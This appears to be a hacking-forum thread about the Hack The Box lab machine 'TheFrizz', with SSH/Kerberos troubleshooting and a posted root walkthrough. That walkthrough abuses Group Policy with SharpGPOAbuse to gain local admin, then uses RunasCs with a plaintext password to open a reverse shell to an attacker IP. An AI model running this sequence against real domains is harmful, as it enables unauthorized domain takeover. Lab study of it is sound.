03-16-2025, 04:34 PM
|
TheFrizz Hack the Box Season 7 (Windows Medium)
by RedBlock - Saturday March 15, 2025 at 03:36 PM
|
|
if anyone still needs root, here, the last part for free:
after having ccache from m.schoolbus, connect via SSH and abuse GPO with: #add new GPO
New-GPO -Name "doesnotmatter"
#add newlink to domain controllers
New-GPLink -Name "doesnotmatter" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
#add m.schoolbus to localadmin group
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName doesnotmatter
#force group policy update
gpupdate /force
#send yourself a revshell with admin rights:
.\RunasC.exe "M.SchoolBus" '!suBcig@MehTed!R' powershell.exe -r 10.10.14.7:9001the transfer of runasc and sharpgpoabuse is up to you
03-16-2025, 05:44 PM
(03-16-2025, 12:44 AM)nguyenhobbes2002 Wrote: krb5.conf i did everything right. still this error . hate this machine .. Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
03-16-2025, 06:16 PM
(03-16-2025, 05:44 PM)Adith19051905 Wrote:(03-16-2025, 12:44 AM)nguyenhobbes2002 Wrote: krb5.conf It should work, when you ssh, try to use: ssh -o GSSAPITrustDNS=no -o GSSAPIAuthentication=yes f.frizzle@frizz.htb
03-16-2025, 06:36 PM
It may also help to have /etc/hosts like this:
10.10.11.60 frizzdc.frizz.htb frizz.htbSo having the DC name as first entry. This resolved some rDNS issues for me.
03-16-2025, 07:49 PM
03-16-2025, 09:22 PM
sudo nmap -sS -n -Pn -p5985,5986 10.10.11.60
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-16 18:20 -03 Nmap scan report for 10.10.11.60 Host is up. PORT STATE SERVICE 5985/tcp filtered wsman 5986/tcp filtered wsmans * NO WORKING evil-winrm...
03-16-2025, 09:48 PM
(03-16-2025, 09:22 PM)adolfo Wrote: sudo nmap -sS -n -Pn -p5985,5986 10.10.11.60 weird... it is on the release arena.
03-17-2025, 03:25 AM
This box is impossible with this configuration..I keep getting the same error too. ChatGPT cant even understand it
ssh -o GSSAPIAuthentication=no -o PubkeyAuthentication=no f.frizzle@frizz.htb
f.frizzle@frizz.htb: Permission denied (gssapi-with-mic,keyboard-interactive).
03-17-2025, 04:28 AM
(03-16-2025, 05:08 PM)ent0xE Wrote: if anyone still needs root, here, the last part for free: thanks for this! ^^ I'll add for anyone who is wondering why the GPO abuse attack works, run whoami /all as M.SchoolBus and take a look at the groups that user is in. That's how you can figure out what attack path you need to follow to become root. |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 22 | 6,584 |
06-25-2026, 02:15 PM Last Post: |
||
| HTB Eloquia User and Root Flags - Insane Box | 13 | 4,827 |
03-27-2026, 06:14 PM Last Post: |
||
| HTB - VOLEUR.HTB - MEDIUM WINDOWS | 1 | 4,572 |
02-09-2026, 07:07 PM Last Post: |
||
| HTB - CERTIFICATE.HTB - HARD WINDOWS | 0 | 1,810 |
02-09-2026, 04:49 PM Last Post: |
||
| Hack the Box FullHouse all 7 flags | 13 | 3,714 |
01-27-2026, 08:30 PM Last Post: |
||
